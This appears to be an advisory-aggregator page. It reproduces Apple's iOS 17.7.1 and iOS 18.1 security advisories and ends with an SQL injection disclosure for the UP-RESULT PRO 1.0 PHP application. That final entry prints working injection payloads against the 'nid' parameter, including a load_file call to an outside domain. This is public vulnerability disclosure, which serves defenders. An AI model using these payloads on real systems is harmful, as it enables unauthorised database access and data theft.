YIcKRpriM0bVYwgj14KDXItnWYCQn7DNH2ACqUto8bxC9NKxbhVIJJR4e8uz+UxL  
zQ7RfAMjbwG1H6JoJsYh81gPAuvgEMYAmXo/l5Kot8Gledzeal7yU6Jd6EQJegFg  
boMJw5a5Gv9cui71llWqqLk3naxWpFF+1Cpw81PutRD2WwRVh4y3e4SMeL7f9pva  
GOTigtDbuH6Trin/wCZIlJ/HHM0Y1fNzEXVLWLMziBpxhZNQMb02jYGYJOhzb10u  
DZcVV/7VfQPDbA2/866L7N0KJH+9uitpO1ybf6sgbpvYLdEsgDE923c1vWnGW8O9  
HtipeZ1KlK5EKr9vx3WIOHqznNIc38jdpAZ4xqhU0NjfbSUMbWs=  
=csbI  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-3

Apple Security Advisory 10-28-2024-2 - iOS 17.7.1 and iPadOS 17.7.1 addresses buffer overflow, information leakage, and out of bounds read vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-10-28-2024-2 iOS 17.7.1 and iPadOS 17.7.1iOS 17.7.1 and iPadOS 17.7.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/121567.Apple maintains a Security Releases page athttps://support.apple.com/100100 which lists recentsoftware updates with security advisories.AccessibilityAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An attacker with physical access to a locked device may be ableto view sensitive user informationDescription: The issue was addressed with improved authentication.CVE-2024-44274: Rizki Maulana (rmrizki.my.id), Matthew Butler, JakeDerouinCoreTextAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing a maliciously crafted font may result in thedisclosure of process memoryDescription: The issue was addressed with improved checks.CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero DayInitiativeCVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero DayInitiativeFoundationAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Parsing a file may lead to disclosure of user informationDescription: An out-of-bounds read was addressed with improved inputvalidation.CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero DayInitiativeImageIOAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing an image may result in disclosure of process memoryDescription: This issue was addressed with improved checks.CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day InitiativeImageIOAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing a maliciously crafted message may lead to a denial-of-serviceDescription: The issue was addressed with improved bounds checks.CVE-2024-44297: Jex AmroKernelAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An app may be able to leak sensitive kernel stateDescription: An information disclosure issue was addressed with improvedprivate data redaction for log entries.CVE-2024-44239: Mateusz Krzywicki (@krzywix)Managed ConfigurationAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Restoring a maliciously crafted backup file may lead tomodification of protected system filesDescription: This issue was addressed with improved handling ofsymlinks.CVE-2024-44258: Hichem Maloufi, Christian Mina, Ismail AmzdakMobileBackupAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Restoring a maliciously crafted backup file may lead tomodification of protected system filesDescription: A logic issue was addressed with improved file handling.CVE-2024-44252: Nimrat Khalsa, Davis Dai, James Gill(@jjtech@infosec.exchange)SafariAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Maliciously crafted web content may violate iframe sandboxingpolicyDescription: A custom URL scheme handling issue was addressed withimproved input validation.CVE-2024-44155: Narendra Bhati, Manager of Cyber Security at Suma SoftPvt. Ltd, Pune (India)Safari DownloadsAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An attacker may be able to misuse a trust relationship todownload malicious contentDescription: This issue was addressed through improved state management.CVE-2024-44259: Narendra Bhati, Manager of Cyber Security at Suma SoftPvt. Ltd, Pune (India)SceneKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing a maliciously crafted file may lead to unexpected appterminationDescription: A buffer overflow was addressed with improved sizevalidation.CVE-2024-44144: 냥냥SceneKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing a maliciously crafted file may lead to heapcorruptionDescription: This issue was addressed with improved checks.CVE-2024-44218: Michael DePlante (@izobashi) of Trend Micro Zero DayInitiativeShortcutsAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: A malicious app may use shortcuts to access restricted filesDescription: A logic issue was addressed with improved checks.CVE-2024-44269: an anonymous researcherSiriAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: A sandboxed app may be able to access sensitive user data insystem logsDescription: An information disclosure issue was addressed with improvedprivate data redaction for log entries.CVE-2024-44278: Kirin (@Pwnrin)VoiceOverAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An attacker may be able to view restricted content from the lockscreenDescription: This issue was addressed by restricting options offered ona locked device.CVE-2024-44261: Braylon (@softwarescool)WebKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing maliciously crafted web content may prevent ContentSecurity Policy from being enforcedDescription: The issue was addressed with improved checks.WebKit Bugzilla: 278765CVE-2024-44296: Narendra Bhati, Manager of Cyber Security at Suma SoftPvt. Ltd, Pune (India)Additional recognitionSecurityWe would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai ofAlibaba Group for their assistance.SpotlightWe would like to acknowledge Paulo Henrique Batista Rosa de Castro(@paulohbrc) for their assistance.WebKitWe would like to acknowledge Eli Grey (eligrey.com) for theirassistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/iTunes and Software Update on the device will automatically checkApple's update server on its weekly schedule. When an update isdetected, it is downloaded and the option to be installed ispresented to the user when the iOS device is docked. We recommendapplying the update immediately if possible. SelectingDon't Install will present the option the next time you connectyour iOS device.The automatic update process may take up to a week depending onthe day that iTunes or the device checks for updates. You maymanually obtain the update via the Check for Updates buttonwithin iTunes, or the Software Update on your device.To check that the iPhone, iPod touch, or iPad has been updated:* Navigate to Settings* Select General* Select About. The version after applying this update will be"iOS 17.7.1 and iPadOS 17.7.1".All information is also posted on the Apple Security Releasesweb site: https://support.apple.com/100100.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcf/ygACgkQX+5d1TXaIvp70A//T4cT9o2AwfLjB9L//65uQu1OEDEoX/dzeVg+V8TDPtTrWCQPhum7J0Djm133fcAFJKoAe65cc3u9C5LH1sNqR9LkMyHVDLavL5cFZRgyHKBJ6JR0AGRRBP6GzGHeU/O5xT7yrJHl31EGODyezzTb+0P5TJ7pCY7SmJNRjrQV0Vhhk87c5bp6dBQavXIIQNKxJU4Z1jPX3XhKaNQ+UwJONWcDMiDLsuuILsZ5bd1DEfviUiw28NmhLSXFcrQjk5qh0/Cago8EYSs/m6geHrLQk+clT1g5UpVBncSyJAY76iUzzrPfgp8lS8mOQztYw5VV9eR+qxpLlJEmROZRg2bOsIMRygmCaA3Z1Eh4sq00jMpS7V7M0BHKBoeRbw2I0asAc0emU1ap/xH4vHGSHEwoPGl36Wl12p3KXNhWIQ3t7jLkQRkq+hvAi9YucBWd84xEq1tbJEImNifiqc4Xe83+QlZfSDmNkavfpxYEKfiojtn2mFQu2FypkZz7+Avrk3F1iY/FFzZqzjr3rOc+tGxHlPPj7lLsjfGRu5iiifC/3H9oRQ6C6KVxS/zDNnaHZDxQkUFOCCOxtSWeCq8ajKyM5wLdqGKRjWS57rwxJM5qxwfWVe/Z76mkSnNm4UnyPu1zHT3vmwXS7uhmkkL+nV3OncIhqF0dGc+abYlSGbFi+rs==+rNo-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-2

Apple Security Advisory 10-28-2024-1 - iOS 18.1 and iPadOS 18.1 addresses information leakage, out of bounds read, and use-after-free vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-10-28-2024-1 iOS 18.1 and iPadOS 18.1iOS 18.1 and iPadOS 18.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/121563.Apple maintains a Security Releases page athttps://support.apple.com/100100 which lists recentsoftware updates with security advisories.AccessibilityAvailable for: iPhone XS and laterImpact: An attacker with physical access to a locked device may be ableto view sensitive user informationDescription: The issue was addressed with improved authentication.CVE-2024-44274: Rizki Maulana (rmrizki.my.id), Matthew Butler, JakeDerouinApp SupportAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: A malicious app may be able to run arbitrary shortcuts withoutuser consentDescription: A path handling issue was addressed with improved logic.CVE-2024-44255: an anonymous researcherCoreMedia PlaybackAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: A malicious app may be able to access private informationDescription: This issue was addressed with improved handling ofsymlinks.CVE-2024-44273: pattern-f (@pattern_F_), Hikerell of Loadshine LabCoreTextAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing a maliciously crafted font may result in thedisclosure of process memoryDescription: The issue was addressed with improved checks.CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero DayInitiativeCVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero DayInitiativeFoundationAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Parsing a file may lead to disclosure of user informationDescription: An out-of-bounds read was addressed with improved inputvalidation.CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero DayInitiativeImageIOAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing an image may result in disclosure of process memoryDescription: This issue was addressed with improved checks.CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day InitiativeImageIOAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing a maliciously crafted message may lead to a denial-of-serviceDescription: The issue was addressed with improved bounds checks.CVE-2024-44297: Jex AmroIOSurfaceAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An app may be able to cause unexpected system termination orcorrupt kernel memoryDescription: A use-after-free issue was addressed with improved memorymanagement.CVE-2024-44285: an anonymous researcheriTunesAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: A remote attacker may be able to break out of Web ContentsandboxDescription: A custom URL scheme handling issue was addressed withimproved input validation.CVE-2024-40867: Ziyi Zhou (@Shanghai Jiao Tong University), Tianxiao Hou(@Shanghai Jiao Tong University)KernelAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An app may be able to leak sensitive kernel stateDescription: An information disclosure issue was addressed with improvedprivate data redaction for log entries.CVE-2024-44239: Mateusz Krzywicki (@krzywix)Managed ConfigurationAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Restoring a maliciously crafted backup file may lead tomodification of protected system filesDescription: This issue was addressed with improved handling ofsymlinks.CVE-2024-44258: Hichem Maloufi, Christian Mina, Ismail AmzdakMobileBackupAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Restoring a maliciously crafted backup file may lead tomodification of protected system filesDescription: A logic issue was addressed with improved file handling.CVE-2024-44252: Nimrat Khalsa, Davis Dai, James Gill(@jjtech@infosec.exchange)Pro ResAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An app may be able to cause unexpected system termination orcorrupt kernel memoryDescription: The issue was addressed with improved memory handling.CVE-2024-44277: an anonymous researcher and Yinyi Wu(@_3ndy1) from DawnSecurity Lab of JD.com, Inc.Safari DownloadsAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An attacker may be able to misuse a trust relationship todownload malicious contentDescription: This issue was addressed through improved state management.CVE-2024-44259: Narendra Bhati, Manager of Cyber Security at Suma SoftPvt. Ltd, Pune (India)Safari Private BrowsingAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Private browsing may leak some browsing historyDescription: An information leakage was addressed with additionalvalidation.CVE-2024-44229: Lucas Di TomaseSceneKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing a maliciously crafted file may lead to heapcorruptionDescription: This issue was addressed with improved checks.CVE-2024-44218: Michael DePlante (@izobashi) of Trend Micro Zero DayInitiativeShortcutsAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An app may be able to access sensitive user dataDescription: This issue was addressed with improved redaction ofsensitive information.CVE-2024-44254: Kirin (@Pwnrin)ShortcutsAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: A malicious app may use shortcuts to access restricted filesDescription: A logic issue was addressed with improved checks.CVE-2024-44269: an anonymous researcherSiriAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An app may be able to access sensitive user dataDescription: This issue was addressed with improved redaction ofsensitive information.CVE-2024-44194: Rodolphe Brunetti (@eisw0lf)SiriAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An attacker with physical access may be able to access contactphotos from the lock screenDescription: This issue was addressed by restricting options offered ona locked device.CVE-2024-40851: Abhay Kailasia (@abhay_kailasia) of Lakshmi NarainCollege of Technology Bhopal India, Srijan PoudelSiriAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An app may be able to access user-sensitive dataDescription: A logic issue was addressed with improved state management.CVE-2024-44263: Kirin (@Pwnrin) and 7feileeSiriAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: A sandboxed app may be able to access sensitive user data insystem logsDescription: An information disclosure issue was addressed with improvedprivate data redaction for log entries.CVE-2024-44278: Kirin (@Pwnrin)SpotlightAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An attacker may be able to view restricted content from the lockscreenDescription: This issue was addressed through improved state management.CVE-2024-44251: Abhay Kailasia (@abhay_kailasia) of Lakshmi NarainCollege of Technology Bhopal IndiaSpotlightAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An attacker may be able to view restricted content from the lockscreenDescription: The issue was addressed with improved checks.CVE-2024-44235: Rizki Maulana (rmrizki.my.id), Dalibor Milanovic,Richard Hyunho Im (@richeeta) with Route Zero SecurityVoiceOverAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An attacker may be able to view restricted content from the lockscreenDescription: This issue was addressed by restricting options offered ona locked device.CVE-2024-44261: Braylon (@softwarescool)WebKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing maliciously crafted web content may prevent ContentSecurity Policy from being enforcedDescription: The issue was addressed with improved checks.WebKit Bugzilla: 278765CVE-2024-44296: Narendra Bhati, Manager of Cyber Security at Suma SoftPvt. Ltd, Pune (India)WebKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing maliciously crafted web content may lead to anunexpected process crashDescription: A memory corruption issue was addressed with improved inputvalidation.WebKit Bugzilla: 279780CVE-2024-44244: an anonymous researcher, Q1IQ (@q1iqF) and P1umer(@p1umer)Additional recognitionAccessibilityWe would like to acknowledge Abhay Kailasia (@abhay_kailasia) of LakshmiNarain College of Technology Bhopal India, Chi Yuan Chang of ZUSO ARTand taikosoup for their assistance.App StoreWe would like to acknowledge Abhay Kailasia (@abhay_kailasia) of LakshmiNarain College of Technology Bhopal India, Chi Yuan Chang of ZUSO ARTand taikosoup for their assistance.CalculatorWe would like to acknowledge Kenneth Chew for their assistance.CalendarWe would like to acknowledge  K宝(@Pwnrin) for their assistance.CameraWe would like to acknowledge Abhay Kailasia (@abhay_kailasia) of LakshmiNarain College of Technology Bhopal India for their assistance.FilesWe would like to acknowledge Chi Yuan Chang of ZUSO ART and taikosoup,Christian Scalese for their assistance.ImageIOWe would like to acknowledge Amir Bazine and Karsten König ofCrowdStrike Counter Adversary Operations, an anonymous researcher fortheir assistance.MessagesWe would like to acknowledge Collin Potter, an anonymous researcher fortheir assistance.NetworkExtensionWe would like to acknowledge Patrick Wardle of DoubleYou & theObjective-See Foundation for their assistance.Personalization ServicesWe would like to acknowledge Abhay Kailasia (@abhay_kailasia) of LakshmiNarain College of Technology Bhopal India, Bistrit Dahal for theirassistance.PhotosWe would like to acknowledge James Robertson, Kamil Bourouiba for theirassistance.Safari Private BrowsingWe would like to acknowledge an anonymous researcher, r00tdaddy fortheir assistance.Safari TabsWe would like to acknowledge Jaydev Ahire for their assistance.SecurityWe would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai ofAlibaba Group for their assistance.SettingsWe would like to acknowledge Chi Yuan Chang of ZUSO ART and taikosoup,JS for their assistance.SiriWe would like to acknowledge Bistrit Dahal for their assistance.SpotlightWe would like to acknowledge Abhay Kailasia (@abhay_kailasia) from LNCTBhopal and C-DAC Thiruvananthapuram India for their assistance.Time ZoneWe would like to acknowledge Abhay Kailasia (@abhay_kailasia) of LakshmiNarain College of Technology Bhopal India and Siddharth Choubey fortheir assistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/iTunes and Software Update on the device will automatically checkApple's update server on its weekly schedule. When an update isdetected, it is downloaded and the option to be installed ispresented to the user when the iOS device is docked. We recommendapplying the update immediately if possible. SelectingDon't Install will present the option the next time you connectyour iOS device.The automatic update process may take up to a week depending onthe day that iTunes or the device checks for updates. You maymanually obtain the update via the Check for Updates buttonwithin iTunes, or the Software Update on your device.To check that the iPhone, iPod touch, or iPad has been updated:* Navigate to Settings* Select General* Select About. The version after applying this update will be"iOS 18.1 and iPadOS 18.1".All information is also posted on the Apple Security Releasesweb site: https://support.apple.com/100100.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcf/dUACgkQX+5d1TXaIvqm0BAApx/I4XTM2+r/UgcEZEbgh0EpJ1eAh4YUjhhfju7hcytJK5hFtXAWoOr8n9ZBIWz2ulzpXnjFkP6NySC6gyPPeF0Mb3TjWcUz9HaSwbscaLaHQOMSHs5+g6npuJreJ0oC3HS1YQiBAuHcjgg/v9QWqP33osue2gF40ywGTfmjIQp1W8Pgm9iUIIiV2whN5M0UWUg4ioxkCI5wol9cE6HYsD38u45RuqkBNa1DEOta4rpHK8t+Tku7nqKP0aH3EPyahxvW5mTG1f0M5yesYrf5xA7XCnwelvHLan+FmtxiCCtlzAyrIeDrut27oBJNN9ypoMC0h9wz8lNw2Z8r/8OzSGBhmQOaIFs3aFDck2k/itvaYscCIZp1hwcU3sQ14mygrxJQCzRJt2P0WNZDQEN3z8qTMfPa22w+0CfjzavCeqJBUAPcz9lVLqzs6wrssaK/MbKA1MleFY1UcfxEPKr2jJ/c1zwxG32OsHowHyYhcrWlURIQO3onCdcDY664cEelaOlm+PkDUY+AWOOOTGB/UpV7JzRFl6oG6VqFFyigd7ukYnZ6R6gRwmhzF13x3VrrynWuQfuuc5nFNI+6K19tjqX6O9p+5bUcK5Pmrs3EglWd3OLIauWLcy4oJGe0KeD70kWoXDCwHFzTQl3MwdMmxAJomsjEUre1ghUifCc/vDs==1SoX-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-1

UP-RESULT PRO version 1.0 suffers from a remote SQL injection vulnerability.

    ## Titles: UP-RESULT[pro-1.0] Multiple-SQLi## Author: nu11secur1ty## Date: 10/28/2024## Vendor: https://mayurik.com/## Software:https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download## Reference: https://portswigger.net/web-security/sql-injection## Description:The `nid` parameter appears to be vulnerable to SQL injection attacks. Thepayload '+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+' wassubmitted in the nid parameter. This payload injects a SQL sub-query thatcalls MySQL's load_file function with a UNC file path that references a URLon an external domain. The application interacted with that domain,indicating that the injected SQL query was executed. The attacker can getall sensitive information from this system when he attacks it online!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: nid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: nid=2'+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' OR NOT9142=9142 AND 'bbjg'='bbjg    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: nid=2'+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'';SELECTSLEEP(7)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: nid=2'+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' AND(SELECT 9083 FROM (SELECT(SLEEP(7)))YMvG) AND 'jiLE'='jiLE    Type: UNION query    Title: MySQL UNION query (NULL) - 3 columns    Payload: nid=2'+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' UNION ALLSELECTNULL,CONCAT(0x7178767871,0x6467686f7670716c49467649584a4744416775554961485747416c4b724977454f75787267707268,0x7162627a71),NULL,NULL#---```## Reproduce:[href](https://www.patreon.com/posts/up-result-pro-1-114856979)## Demo PoC:[href](https://www.nu11secur1ty.com/2024/10/up-resultpro-10-multiple-sqli.html)## Time spent:01:27:00

Tag

#web